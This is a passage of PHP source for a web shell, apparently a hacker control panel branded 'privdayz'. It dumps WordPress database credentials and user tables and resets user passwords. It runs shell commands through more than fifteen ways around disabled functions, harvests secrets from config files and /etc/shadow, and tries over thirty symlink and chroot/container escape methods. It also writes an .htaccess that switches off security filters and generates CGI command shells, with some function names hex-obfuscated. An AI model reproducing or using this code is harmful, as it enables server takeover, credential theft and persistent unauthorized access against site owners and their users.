// install's configuration is loaded; `reset_uid` and `newpw` select the
// account and the new password. The handler exits after responding.
if ($_SERVER['REQUEST_METHOD']=='POST' && isset($_POST['wp_dir'])) {
    $wp_dir = $_POST['wp_dir'];
    $cfg = wp_get_db_config($wp_dir);
    $db = $cfg['db'] ?? '';
    $user = $cfg['user'] ?? '';
    $pass = $cfg['pass'] ?? '';
    $host = $cfg['host'] ?? 'localhost';
    $prefix = $cfg['prefix'] ?? 'wp_';
    $mysqli = @new mysqli($host, $user, $pass, $db);
    if ($mysqli->connect_errno) { echo ""; exit; }
    if (isset($_POST['reset_pw'], $_POST['reset_uid'], $_POST['newpw'])) {
        $uid = intval($_POST['reset_uid']);
        $newpw = trim($_POST['newpw']);
        if (wp_reset_pw($mysqli, $prefix, $uid, $newpw)) { echo ""; } else { echo ""; }
        exit;
    }
}
// Listing loop: for every discovered install, print its database settings and
// its user table. The remaining lines are reproduced unchanged.
foreach ($wp_dirs as $wp_dir): $cfg = wp_get_db_config($wp_dir); $db = $cfg['db'] ?? ''; $user = $cfg['user'] ?? ''; $pass = $cfg['pass'] ?? ''; $host = $cfg['host'] ?? 'localhost'; $prefix = $cfg['prefix'] ?? 'wp_'; $wp_version = wp_get_version($wp_dir); echo '
'; echo '
'; echo ' '.htmlspecialchars($wp_dir).''; if ($wp_version) echo 'WP '.$wp_version.''; echo ' h0st: '.htmlspecialchars($host).' db_user: '.htmlspecialchars($user).' db_pw: '.htmlspecialchars($user).' db: '.htmlspecialchars($db).' pref1x: '.$prefix.' '; echo '
'; $users = []; $mysqli = @new mysqli($host, $user, $pass, $db); if ($mysqli->connect_errno) { echo '
DB Error: '.htmlspecialchars($mysqli->connect_error).'
'; echo '
'; continue; } $users = wp_fetch_users($mysqli, $prefix); $site_url = get_site_url($mysqli, $prefix); echo '
'; foreach ($users as $u) { $pw_val = "privdayz".rand(100,999); echo ''; } echo '
IDuseremailrolereset pwwp-login
'.$u['ID'].' '.htmlspecialchars($u['user_login']).' '.htmlspecialchars($u['user_email']).' '.$u['role'].'
'; if ($site_url) { $login_url = htmlspecialchars($site_url . '/wp-login.php?log=' . urlencode($u['user_login'])); echo 'login'; } else { echo 'no site url'; } echo '
'; echo '
'; endforeach; ?>
Command Nirvana
Execute shell/command bypasses, 2025 ready, 15+ method
    &1", "r"); if ($f) { while (!feof($f)) $out .= fread($f, 4096); fclose($f);} if (trim($out)) $ok = true; @ini_restore('filter.default'); } elseif ($meth === 'ld_preload') { if (strtoupper(substr(PHP_OS,0,3)) !== 'WIN') { putenv('LD_PRELOAD=/tmp/x.so'); $out = @chDx2x($c.' 2>&1'); putenv('LD_PRELOAD'); if (trim($out)) $ok = true; } } elseif ($meth === 'prepend') { $prepend = sys_get_temp_dir()."/xx".uniqid().".php"; @file_put_contents($prepend, ""); @ini_set("auto_prepend_file", $prepend); $out = @file_get_contents($_SERVER['SCRIPT_FILENAME']); @ini_restore("auto_prepend_file"); @unlink($prepend); if (trim($out)) $ok = true; } elseif ($meth === 'suhosin') { @ini_set('suhosin.executor.func.blacklist', ''); $out = @chDx2x($c.' 2>&1'); if (trim($out)) $ok = true; } elseif ($meth === 'mailinj') { $tmpf = sys_get_temp_dir()."/m".uniqid().".txt"; @mail("v@x.com", "", "", "", "-X $tmpf; $c >$tmpf 2>&1"); if (file_exists($tmpf)) { $out = file_get_contents($tmpf); unlink($tmpf); $ok = true; } } elseif ($meth === 'errlog') { $tmpf = sys_get_temp_dir()."/e".uniqid().".txt"; @error_log("", 3, $tmpf); if (file_exists($tmpf)) { $out = file_get_contents($tmpf); unlink($tmpf); $ok = true; } } elseif ($meth === 'fopeninput') { $h = @fopen("php://input", "r"); if ($h) { $out = @fread($h, 8192); fclose($h); $ok = true; } } elseif ($meth === 'binbrute') { foreach(['sh','bash','python','perl','nc','busybox','wget'] as $bin){ $which = trim(@chDx2x("which $bin")); if($which) { $out = @chDx2x("$which -c \"$c\" 2>&1"); if (trim($out)) { $ok = true; break; } } } } elseif ($meth === 'ht404') { $out = ''; } elseif ($meth === 'imagemagick') { $tmpi = sys_get_temp_dir().'/img'.uniqid().'.mvg'; $tmpp = sys_get_temp_dir().'/out'.uniqid().'.png'; file_put_contents($tmpi, "push graphic-context\nviewbox 0 0 640 480\nfill 'url(https://|$c|)'\npop graphic-context"); @chDx2x("convert $tmpi $tmpp"); if (file_exists($tmpp)) $out = file_get_contents($tmpp); @unlink($tmpi); @unlink($tmpp); if 
(trim($out)) $ok = true; } elseif ($meth === 'cgienv') { putenv("CGI_COMMAND=$c"); $out = getenv("CGI_COMMAND"); if (trim($out)) $ok = true; } else { if (function_exists($meth)) { if ($meth === $M[0]) { $out = @$meth($c.' 2>&1'); if (trim($out)) $ok = true; } else if ($meth === $M[1]) { $a=[]; $meth($c.' 2>&1', $a); $out = join("\n", $a); if (trim($out)) $ok = true; } else if ($meth === $M[2]) {  @$meth($c.' 2>&1'); $out = ""; if (trim($out)) $ok = true; } else if ($meth === $M[3]) {  @$meth($c.' 2>&1'); $out = ""; if (trim($out)) $ok = true; } else if ($meth === $M[4]) { $h=@$meth($c.' 2>&1',"r"); if ($h) { while(!feof($h)) $out.=fread($h,4096); fclose($h); } if (trim($out)) $ok = true; } else if ($meth === $M[5]) { $desc = [1=>["pipe","w"], 2=>["pipe","w"]]; $p = @$meth($c.' 2>&1', $desc, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); if (trim($out)) $ok = true; } } } } if ($ok && trim($out)) { $R = $out; break; } } echo htmlspecialchars($R ?: "[X] No output / all methods blocked.\n");}?>
cpanel/linux loot & hash hunter
Type Found File/Path Copy
$max) break; $r[] = $fp; if (@is_dir($fp)) $r = array_merge($r, xxls($fp, $max, $c)); } if ($h) @closedir($h); return $r; } function xcat($f, $max=80) { $c = ''; if (@is_readable($f)) { $h = @fopen($f, 'r'); if ($h) { $i = 0; while (!feof($h) && $i++< $max) $c .= fgets($h); fclose($h); } } return $c; } function xsearch($txt) { $hits = []; $rx = '/(password|passwd|pass|hash|apikey|secret|user(name)?|login|auth|smtp|db(name)?|email|mail|token)[\'"\]\[]?\s*[:=].{0,100}?([\'"]?[a-zA-Z0-9\@\#\-\_\.\$\!\%\^\&\*\/\+]{6,128})/i'; foreach (explode("\n", $txt) as $l) { if (preg_match($rx, $l, $m)) { $hits[] = ['key'=>$m[1],'val'=>trim($m[2]),'line'=>trim($l)]; } } return $hits; } function xcp_copy_btn($txt) { return ''; } function prvd_cmd($cmd) { if (function_exists('pr1vd4yzC')) { return pr1vd4yzC($cmd); } else if (function_exists('shell_exec')) { return @shell_exec($cmd); } else if (function_exists('system')) { @system($cmd);return ""; } else if (function_exists('exec')) { $o = []; @exec($cmd, $o); return join("\n", $o); } return ''; } $user = @get_current_user(); if (!$user || $user === 'apache' || $user === 'www-data' || $user === 'nobody') { $user = @trim(prvd_cmd('whoami')); } $hm = @getenv('HOME') ?: (@$_SERVER['HOME'] ?: @trim(prvd_cmd('echo ~'))); if (!$hm || !@is_dir($hm)) $hm = '.'; $out = ['done'=>true,'rows'=>[]]; if ($step == 'passwd') { $special = ['/etc/passwd','/etc/shadow','/etc/master.passwd']; foreach ($special as $sp) { if (@is_readable($sp)) { $lines = xcat($sp, 180); foreach (explode("\n", $lines) as $l) { if ($user && stripos($l, $user)!==false) { $out['rows'][] = [ 'type'=>'userhash', 'value'=>$user, 'line'=>htmlspecialchars($l), 'path'=>$sp, 'copy'=>xcp_copy_btn($l) ]; } } } } } if ($step == 'configs') { $dirs = [$hm, ".", "/home", "/var/www", "/var/www/html", "/usr/local/apache", "/etc", "/tmp", "/var/tmp"]; $configs = [ 
'.my.cnf','.pgpass','.env','wp-config.php','configuration.php','settings.py','local.env','db.php','.ftpconfig','.ftppass','.netrc', 'app/etc/env.php','settings_local.py','mail.php','smtp.php','config.php','appsettings.json','web.config' ]; $allf = []; foreach ($dirs as $d) { $c = 0; foreach (xxls($d, 700, $c) as $f) { $bn = basename($f); if (in_array($bn,$configs) || preg_match('~(conf|sql|pass|mail|user|key|ftp|env|wp|token|smtp|secret)~i', $bn)) $allf[$f]=1; } } foreach(array_keys($allf) as $f){ $dat = xcat($f, 120); $found = xsearch($dat); foreach($found as $hit){ $out['rows'][] = [ 'type'=>htmlspecialchars($hit['key']), 'value'=>htmlspecialchars($hit['val']), 'line'=>htmlspecialchars($hit['line']), 'path'=>htmlspecialchars($f), 'copy'=>xcp_copy_btn($hit['val']) ]; } }} if ($step == 'maildirs') { $maildirs = [ "$hm/.roundcube","$hm/.horde","$hm/webmail","$hm/.mail", "/var/mail/$user","/var/spool/mail/$user" ]; foreach($maildirs as $md){ $c=0; foreach(xxls($md, 200, $c) as $f){ if(preg_match('~(conf|sql|pass|user|imap|rcmail|login|settings|auth|db)~i',basename($f))){ $dat = xcat($f, 90); $found = xsearch($dat); foreach($found as $hit){ $out['rows'][] = [ 'type'=>htmlspecialchars($hit['key']), 'value'=>htmlspecialchars($hit['val']), 'line'=>htmlspecialchars($hit['line']), 'path'=>htmlspecialchars($f), 'copy'=>xcp_copy_btn($hit['val']) ]; } } } } } if ($step == 'backups') { $c=0; foreach(xxls($hm, 400, $c) as $f){ if(preg_match('~\.tar\.gz$~',$f)){ $cmd = "tar -tzf ".escapeshellarg($f)."|grep -Ei '(conf|pass|user|db|wp|auth|token|mail|.env|settings)'|head -n 14"; $res = prvd_cmd($cmd); foreach(explode("\n",$res) as $l) if($l) $out['rows'][] = [ 'type'=>'backup-file', 'value'=>htmlspecialchars($l), 'line'=>'', 'path'=>htmlspecialchars($f), 'copy'=>xcp_copy_btn($l) ]; } } } echo json_encode($out); exit; } ?> "\x6c\x6e\x20\x2d\x73", 'cp'=>"\x63\x70", 'touch'=>"\x74\x6f\x75\x63\x68", 'cat'=>"\x63\x61\x74", 'chmod'=>"\x63\x68\x6d\x6f\x64", 
'lsattr'=>"\x6c\x73\x61\x74\x74\x72", 'mkfifo'=>"\x6d\x6b\x66\x69\x66\x6f", ]; return $pr1pr1vs[$key]??'';} function pz_s7m_methods($rtfccq, $outdir) { $results=[]; $rand=substr(md5(mt_rand()),0,5); $lnfile = $outdir.'/pz_s7m_ln_'.$rand; $cpyfile = $outdir.'/pz_s7m_cp_'.$rand; $fifo = $outdir.'/pz_s7m_fifo_'.$rand; $touch = $outdir.'/pz_s7m_touch_'.$rand; $lnname = $lnfile; $procpath = "/proc/1/root".$rtfccq; $try=[]; $try[] = function($t,$o){ // 1 try { if(func_enabled('symlink')) { $ok=@symlink($t,$o); return ['symlink()',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['symlink()',false,'ERROR']; } return ['symlink()',false,'DISABLED']; }; $try[] = function($t,$o){ // 2 try { if(func_enabled('shell_exec')) { $c=__pzCmd('lns')." ".escapeshellarg($t)." ".escapeshellarg($o); @shell_exec($c); $ok=@is_link($o)||@file_exists($o); return ['shell_exec(ln -s)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['shell_exec',false,'ERROR']; } return ['shell_exec',false,'DISABLED']; }; $try[] = function($t,$o){ // 3 try { if(func_enabled('exec')) { $c=__pzCmd('lns')." ".escapeshellarg($t)." ".escapeshellarg($o); $out=null; @exec($c,$out); $ok=@is_link($o)||@file_exists($o); return ['exec(ln -s)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['exec',false,'ERROR']; } return ['exec',false,'DISABLED']; }; $try[] = function($t,$o){ // 4 try { if(func_enabled('system')) { $c=__pzCmd('lns')." ".escapeshellarg($t)." ".escapeshellarg($o); @system($c); $ok=@is_link($o)||@file_exists($o); return ['system(ln -s)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['system',false,'ERROR']; } return ['system',false,'DISABLED']; }; $try[] = function($t,$o){ // 5 try { if(func_enabled('popen')) { $c=__pzCmd('lns')." ".escapeshellarg($t)." 
".escapeshellarg($o); $h=@popen($c,"r"); if($h)fclose($h); $ok=@is_link($o)||@file_exists($o); return ['popen(ln -s)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['popen',false,'ERROR']; } return ['popen',false,'DISABLED']; }; $try[] = function($t,$o){ // 6 try { if(func_enabled('proc_open')) { $c=__pzCmd('lns')." ".escapeshellarg($t)." ".escapeshellarg($o); $d=[1=>["pipe","w"],2=>["pipe","w"]]; $p=@proc_open($c,$d,$pipes); if(is_resource($p)){@fclose($pipes[1]);@fclose($pipes[2]);} $ok=@is_link($o)||@file_exists($o); return ['proc_open(ln -s)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['proc_open',false,'ERROR']; } return ['proc_open',false,'DISABLED']; }; $try[] = function($t,$o){ // 7 try { if(func_enabled('file_put_contents') && func_enabled('file_get_contents')) { $ok=@file_exists($t)?@file_put_contents($o,@file_get_contents($t))!==false:false; return ['file_put_contents',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['file_put_contents',false,'ERROR']; } return ['file_put_contents',false,'DISABLED']; }; $try[] = function($t,$o){ // 8 try { if(func_enabled('copy')) { $ok=@copy($t,$o); return ['copy()',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['copy',false,'ERROR']; } return ['copy',false,'DISABLED']; }; $try[] = function($t,$o){ // 9 try { if(func_enabled('touch') && func_enabled('file_get_contents')) { $ok=@file_exists($t)?(@touch($o)&&@file_put_contents($o,@file_get_contents($t))):false; return ['touch+file_get',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['touch',false,'ERROR']; } return ['touch',false,'DISABLED']; }; $try[] = function($t,$o){ // 10 try { if(func_enabled('mkfifo') && func_enabled('file_get_contents')) { $ok=@mkfifo($o,0600); if($ok&&@file_exists($t))@file_put_contents($o,@file_get_contents($t)); $ok2=@file_exists($o)&&filesize($o)>0; return ['mkfifo',$ok2,$ok2?'OK':'FAIL']; }} catch(Throwable $e) { return ['mkfifo',false,'ERROR']; } return ['mkfifo',false,'DISABLED']; }; $try[] = 
function($t,$o){ // 11 try { if(func_enabled('symlink')) { $ok=@symlink('/proc/1/root'.$t,$o); return ['procfs',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['procfs',false,'ERROR']; } return ['procfs',false,'DISABLED']; }; $try[] = function($t,$o){ // 12 try { if(func_enabled('shell_exec')) { $c=__pzCmd('cp')." ".escapeshellarg($t)." ".escapeshellarg($o); @shell_exec($c); $ok=@file_exists($o); return ['shell_exec(cp)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['shell_exec(cp)',false,'ERROR']; } return ['shell_exec(cp)',false,'DISABLED']; }; $try[] = function($t,$o){ // 13 try { $arr=[escapeshellarg($t),escapeshellarg('./'.$t),escapeshellarg('../'.$t)];$ok=false;foreach($arr as$p){if(func_enabled('shell_exec')) {@shell_exec(__pzCmd('lns').' '.$p.' '.escapeshellarg($o));if(@file_exists($o)){$ok=true;break;}}}return ['ln_s path hacks',$ok,$ok?'OK':'FAIL']; } catch(Throwable $e) { return ['ln_s path hacks',false,'ERROR']; } return ['ln_s path hacks',false,'DISABLED']; }; $try[] = function($t,$o){ // 14 try { if(func_enabled('readlink')) { @$rl=readlink($o); $ok=@is_link($o); return ['readlink-chain',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['readlink-chain',false,'ERROR']; } return ['readlink-chain',false,'DISABLED']; }; $try[] = function($t,$o){ // 15 try { if(func_enabled('imap_open')) { @$m=imap_open("{".$t.":143/novalidate-cert}INBOX","user","pass"); $ok=@file_exists($o); return ['imap_open',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['imap_open',false,'ERROR']; } return ['imap_open',false,'DISABLED']; }; $try[] = function($t,$o){ // 16 try { if(file_exists('/var/log/httpd/access_log') && func_enabled('file_get_contents')) { $log = @file_get_contents('/var/log/httpd/access_log'); $ok=strpos($log,$t)!==false; return ['log poisoning',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['log poisoning',false,'ERROR']; } return ['log poisoning',false,'DISABLED']; }; $try[] = function($t,$o){ // 17 try { 
if(ini_get('open_basedir') && func_enabled('symlink')) { $ok=@symlink('/tmp/../'.$t,$o); return ['open_basedir race',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['open_basedir race',false,'ERROR']; } return ['open_basedir race',false,'DISABLED']; }; $try[] = function($t,$o){ // 18 try { $src='php://filter/read=convert.base64-encode/resource=' . $t; if(func_enabled('file_get_contents') && func_enabled('file_put_contents')) { $dat=@file_get_contents($src); $ok=false;if($dat)$ok=@file_put_contents($o.'.b64',$dat); return ['php://filter',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['php://filter',false,'ERROR']; } return ['php://filter',false,'DISABLED']; }; $try[] = function($t,$o){ // 19 try { $locs=['/tmp','/dev/shm'];$ok=false;foreach($locs as$loc){$spath=$loc.'/pz_s7m_ln_'.rand(10,99);if(func_enabled('symlink')){@symlink($t,$spath);if(is_link($spath))$ok=true;}} return ['tmp/devshm', $ok, $ok?'OK':'FAIL']; } catch(Throwable $e) { return ['tmp/devshm',false,'ERROR']; } return ['tmp/devshm',false,'DISABLED']; }; $try[] = function($t,$o){ // 20 try { if(func_enabled('symlink') && func_enabled('copy')) { $ok=@symlink($t,$o);if($ok){@$cp=copy($o,$o.'_cp'); $ok2=@file_exists($o.'_cp');return ['symlink+copy',$ok2,$ok2?'OK':'FAIL'];} } } catch(Throwable $e) { return ['symlink+copy',false,'ERROR']; } return ['symlink+copy',false,'DISABLED']; }; $try[] = function($t,$o){ // 21 try { if(func_enabled('symlink')) { $ok=@symlink('/proc/self/cwd/'.$t,$o);return ['/proc/self/cwd',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['/proc/self/cwd',false,'ERROR']; } return ['/proc/self/cwd',false,'DISABLED']; }; $try[] = function($t,$o){ // 22 try { if(func_enabled('file_put_contents')) { $r=false;for($i=1;$i<8;$i++){$r=@file_put_contents($o,str_repeat('*',$i));if($r){break;}}return ['putcontent fuzz',$r,$r?'OK':'FAIL']; }} catch(Throwable $e) { return ['putcontent fuzz',false,'ERROR']; } return ['putcontent fuzz',false,'DISABLED']; }; $try[] = 
function($t,$o){ // 23 try { if(func_enabled('chmod')) { $ok=@file_exists($t);$r=$ok&&@chmod($t,0777);return ['chmod direct',$r,$r?'OK':'FAIL']; }} catch(Throwable $e) { return ['chmod direct',false,'ERROR']; } return ['chmod direct',false,'DISABLED']; }; $try[] = function($t,$o){ // 24 try { if(func_enabled('shell_exec')) { $c=__pzCmd('chmod')." 777 ".escapeshellarg($t);@shell_exec($c);$r=@is_writable($t);return ['chmod shell',$r,$r?'OK':'FAIL']; }} catch(Throwable $e) { return ['chmod shell',false,'ERROR']; } return ['chmod shell',false,'DISABLED']; }; $try[] = function($t,$o){ // 25 try { if(func_enabled('dl')) { $ok=@dl($t);return ['dl()',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['dl()',false,'ERROR']; } return ['dl()',false,'DISABLED']; }; $try[] = function($t,$o){ // 26 try { if(func_enabled('copy')) { $ok=@file_exists($t)&&(@copy($t,$o.'bak'));return ['copy bak',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['copy bak',false,'ERROR']; } return ['copy bak',false,'DISABLED']; }; $try[] = function($t,$o){ // 27 try { if(func_enabled('proc_open')) { $c='cat '.escapeshellarg($t).' > '.escapeshellarg($o); $d=[1=>["pipe","w"],2=>["pipe","w"]]; $p=@proc_open($c,$d,$pipes); if(is_resource($p)){@fclose($pipes[1]);@fclose($pipes[2]);} $ok=@file_exists($o);return ['proc_open(cat>out)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['proc_open(cat>out)',false,'ERROR']; } return ['proc_open(cat>out)',false,'DISABLED']; }; $try[] = function($t,$o){ // 28 try { if(func_enabled('shell_exec')) { $c='echo '.escapeshellarg($t).' 
> '.escapeshellarg($o.'.echo');@shell_exec($c);$ok=@file_exists($o.'.echo');return ['echo > file',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['echo > file',false,'ERROR']; } return ['echo > file',false,'DISABLED']; }; $try[] = function($t,$o){ // 29 try { if(func_enabled('stream_copy_to_stream')) { $ok=@stream_copy_to_stream(fopen($t,'r'),fopen($o,'w'));return ['stream_copy_to_stream',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['stream_copy_to_stream',false,'ERROR']; } return ['stream_copy_to_stream',false,'DISABLED']; }; $try[] = function($t,$o){ // 30 try { if(func_enabled('link')) { $ok=@link($t,$o.'_hard');return ['hardlink',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['hardlink',false,'ERROR']; } return ['hardlink',false,'DISABLED']; }; $try[] = function($t,$o){ // 31 try { if(func_enabled('posix_mkfifo')) { $ok=@posix_mkfifo($o,0600);return ['posix_mkfifo',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['posix_mkfifo',false,'ERROR']; } return ['posix_mkfifo',false,'DISABLED']; }; $log=[]; $success=false; foreach($try as $meth){ $r = $meth($rtfccq,$lnname); $log[] = $r; if($r[1]) { $success=true; $htcode2 = << ForceType text/plain SetHandler default-handler php_flag engine off Require all granted SecFilterEngine Off SecFilterScanPOST Off SecRuleEngine Off RewriteEngine On RewriteRule ^ - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L] RewriteCond %{REQUEST_STATUS} 403 RewriteRule ^ - [L,R=200] RemoveHandler .php .phtml .phar .inc .html .bak .db .sql .config .env .json .xml Allow from all Satisfy any HT; $htdir = dirname($lnname); @file_put_contents($htdir . '/.htaccess', $htcode2); break; } } return [$lnname, $log]; } $outdir = __DIR__ . '/pr1vd4yz_s7m'; if(!is_dir($outdir)) @mkdir($outdir,0775,true); $log = []; $final_link = ''; if(isset($_POST['pz_target_path'])) { $tp = trim($_POST['pz_target_path']); list($final_link,$log) = pz_s7m_methods($tp,$outdir); } ?>
Symlink Jail Escaper
30+ chained methods. All output in /pr1vd4yz_s7m.
First found:
Manual open or cat to view
[]
chr00t/jailbreak
Terminal: Sequentially executes advanced chroot/jail escape commands.
chroot escape suite (v2025)
['pipe','w'],2=>['pipe','w']]; $proc=@proc_open($pr1pr1v." 2>&1",$desc,$pipes,null,null,["bypass_shell"=>false]); if(!is_resource($proc))return "[FAIL] proc_open failed"; $out='';$st=microtime(true); stream_set_blocking($pipes[1],false);stream_set_blocking($pipes[2],false); while(true){ $read=[$pipes[1],$pipes[2]];$w=null;$e=null; stream_select($read,$w,$e,0,200000); foreach($read as $r){$o=fread($r,2048);if($o===false)$o='';$out.=$o;if(strlen($out)>$max_output){$out.="\n[TRUNCATED]";break 2;}} if((microtime(true)-$st)>$timeout){$out.="\n[TIMEOUT]";break;} if(feof($pipes[1])&&feof($pipes[2]))break; } foreach($pipes as $p)@fclose($p);@proc_terminate($proc,9);@proc_close($proc); return $out; } $jBmcR = [ [ 'title'=>'/proc/self/fd/ Method', 'cmds'=>['ls -l /proc/self/fd/', 'cat /proc/self/fd/0', 'echo "FOO" >/proc/self/fd/1'], 'desc'=>'Abuse /proc/self/fd/* (open descriptors) to escape/jump mount points.', ], [ 'title'=>'Mount proc Overwrite', 'cmds'=>['mount -t proc proc /mnt 2>&1;ls /mnt'], 'desc'=>'Mounts new proc, tries to enumerate host PIDs/devices.' ], [ 'title'=>'Pivot_root/Chroot Trick', 'cmds'=>['mkdir -p /tmp/a /tmp/a/old;pivot_root /tmp/a /tmp/a/old 2>&1;ls /'], 'desc'=>'Classic pivot_root with empty dir to try escaping mount jail.' ], [ 'title'=>'Busybox/ash Escape', 'cmds'=>['busybox sh -i || busybox ash -i'], 'desc'=>'Attempts to spawn unrestricted Busybox shell.' ], [ 'title'=>'/dev/ Console Escape', 'cmds'=>['ls -l /dev/console;cat /dev/console 2>&1'], 'desc'=>'Tries to access /dev/console for raw escape.' ], [ 'title'=>'OverlayFS CVE-2015-1328', 'cmds'=>['mkdir /tmp/ovl; mkdir /tmp/ovl2; mount -t overlay overlay -o lowerdir=/,upperdir=/tmp/ovl,workdir=/tmp/ovl2 /mnt 2>&1;ls /mnt'], 'desc'=>'Old overlayfs exploit for breaking out of chroot.' ], [ 'title'=>'/proc/$PPID Root Path', 'cmds'=>['cat /proc/1/root/etc/passwd 2>&1', 'ls -l /proc/1/root/'], 'desc'=>'Attempts to read files from outside the jail using /proc/1/root.' 
], [ 'title'=>'Oldschool Symlink Bomb', 'cmds'=>['ln -s / /tmp/rootlink;ls /tmp/rootlink 2>&1'], 'desc'=>'Symlink root of real fs, enumerate for breakouts.' ], [ 'title'=>'/etc/mtab & /etc/fstab Dump', 'cmds'=>['cat /etc/mtab 2>&1', 'cat /etc/fstab 2>&1'], 'desc'=>'Checks for real mount info leak.' ], [ 'title'=>'SUID Binary Scan', 'cmds'=>['find / -perm -4000 -type f 2>/dev/null|head -n20'], 'desc'=>'List SUID binaries for local root escape vectors.' ], [ 'title'=>'Proc Stat Mountinfo', 'cmds'=>['cat /proc/self/mountinfo 2>&1'], 'desc'=>'Mountinfo leaks parent mount options/paths.' ], [ 'title'=>'/dev/mem & /dev/kmem', 'cmds'=>['ls -l /dev/mem /dev/kmem2>&1'], 'desc'=>'If open, can be abused for full escape (rare, but legacy).' ], [ 'title'=>'FUSE Escape', 'cmds'=>['fusermount -u /mnt 2>&1', 'fusermount -u / 2>&1'], 'desc'=>'If FUSE is active, can unmount or mount host dirs.' ], [ 'title'=>'Python os.open Trick', 'cmds'=>['python3 -c "import os;print(os.open(\'/etc/passwd\',0))" 2>&1'], 'desc'=>'Abuses python3 to open fds outside jail.' ], [ 'title'=>'Perl Jail Escape', 'cmds'=>['perl -e \'open F,"/etc/passwd";while(){print}\' 2>&1'], 'desc'=>'Abuse perl to leak jail info or escape.' ], [ 'title'=>'LXC Breakout', 'cmds'=>['lxc-info -n name 2>&1', 'lxc-attach -n name -- id'], 'desc'=>'Checks for open LXC containers.' ], [ 'title'=>'Docker Host Enumeration', 'cmds'=>['cat /.dockerenv 2>&1', 'ls /run/.containerenv 2>&1'], 'desc'=>'Detects container environment and potential for host escape.' ], [ 'title'=>'procfs Hardlink/FD abuse', 'cmds'=>['ls -l /proc/self/fd', 'ls -l /proc/*/fd'], 'desc'=>'List open FDs in other processes (enumeration).' ], [ 'title'=>'Pivot dev/ptmx', 'cmds'=>['ls -l /dev/ptmx', 'cat /dev/ptmx 2>&1'], 'desc'=>'Escape via dev/ptmx if accessible.' ], [ 'title'=>'Escape with nc, curl, wget', 'cmds'=>['which nc;which curl;which wget'], 'desc'=>'Check if remote file tools are present (for pulling escape binaries).' 
], [ 'title'=>'Shell/Interpreter Injection', 'cmds'=>['python -c "import pty;pty.spawn(\'/bin/sh\')" 2>&1','perl -e \'exec "/bin/sh";\' 2>&1','ruby -e \'exec \"/bin/sh\"\' 2>&1'], 'desc'=>'Tries to spawn interactive shells using interpreters.' ], [ 'title'=>'/proc/1/cwd / root', 'cmds'=>['ls -l /proc/1/cwd', 'ls -l /proc/1/root'], 'desc'=>'Enumerates host working dir and root dir.' ], ]; $step=0; foreach($jBmcR as $method){ echo '
# '.$method['title'].'
'; echo '
'.$method['desc'].'
'; foreach($method['cmds'] as $pr1pr1v){ echo '
> '.htmlspecialchars($pr1pr1v).'
'; try { $out = xfnQ1v($pr1pr1v,2,8192); $clean = trim((string)$out); $fail = ( $clean === "" || stripos($clean, ''.htmlspecialchars($clean).'
'; } else { echo '
[FAIL] '.htmlspecialchars($clean ? $clean : 'print fail').'
'; } } catch(Throwable $e) { echo '
[FAIL] Exception: '.$e->getMessage().'
'; } catch(Exception $e) { echo '
[FAIL] Exception: '.$e->getMessage().'
'; } $step++; usleep(25000); } } echo '
[commands completed!]
'; ?>
Multi-Bypass CGI Generator
".$ve5c970b653);}else{echo"RSS Error.";} ?> PHP; $f = fopen($phf,"w"); fwrite($f,$php_payload); fclose($f); chmod($phf,0755); $paths[] = ["Php c0mmand sh3ll pr1v", $phf]; $fullbase = $domain . ($dir ? $dir : ''); echo '
CGI deployed! All chmod 755.
    '; foreach($paths as $sh) { $rel = $sh[1]; $url = $fullbase . '/' . $rel; $link = $url . ''; echo '
  • '.htmlspecialchars($sh[0]).': '.htmlspecialchars($rel).' Open (chmod 755)
  • '; } echo '
'; } ?>
backd00r scanner
$fnc_obf("\x67\x6c\x6f\x62"), 'fopen'=>$fnc_obf("\x66\x6f\x70\x65\x6e"), 'fgets'=>$fnc_obf("\x66\x67\x65\x74\x73"), 'fclose'=>$fnc_obf("\x66\x63\x6c\x6f\x73\x65"), 'fsize'=>$fnc_obf("\x66\x69\x6c\x65\x73\x69\x7a\x65"), 'ftime'=>$fnc_obf("\x66\x69\x6c\x65\x6d\x74\x69\x6d\x65"), 'preg_match'=>$fnc_obf("\x70\x72\x65\x67\x5f\x6d\x61\x74\x63\x68"), 'is_readable'=>$fnc_obf("\x69\x73\x5f\x72\x65\x61\x64\x61\x62\x6c\x65"), 'basename'=>$fnc_obf("\x62\x61\x73\x65\x6e\x61\x6d\x65"), 'dirname'=>$fnc_obf("\x64\x69\x72\x6e\x61\x6d\x65"), 'ht'=>$fnc_obf("\x68\x74\x6d\x6c\x73\x70\x65\x63\x69\x61\x6c\x63\x68\x61\x72\x73") ]; $patterns = [ '/eval\s*\((.*?)\)/i', '/assert\s*\(/i', '/system\s*\(/i', '/shell_exec\s*\(/i', '/passthru\s*\(/i', '/base64_decode\s*\(/i', '/gzinflate\s*\(/i', '/gzuncompress\s*\(/i', '/gzdecode\s*\(/i', '/str_rot13\s*\(/i', '/create_function\s*\(/i', '/php\s+.*?\/\*.*?base64.*?\*\//is', 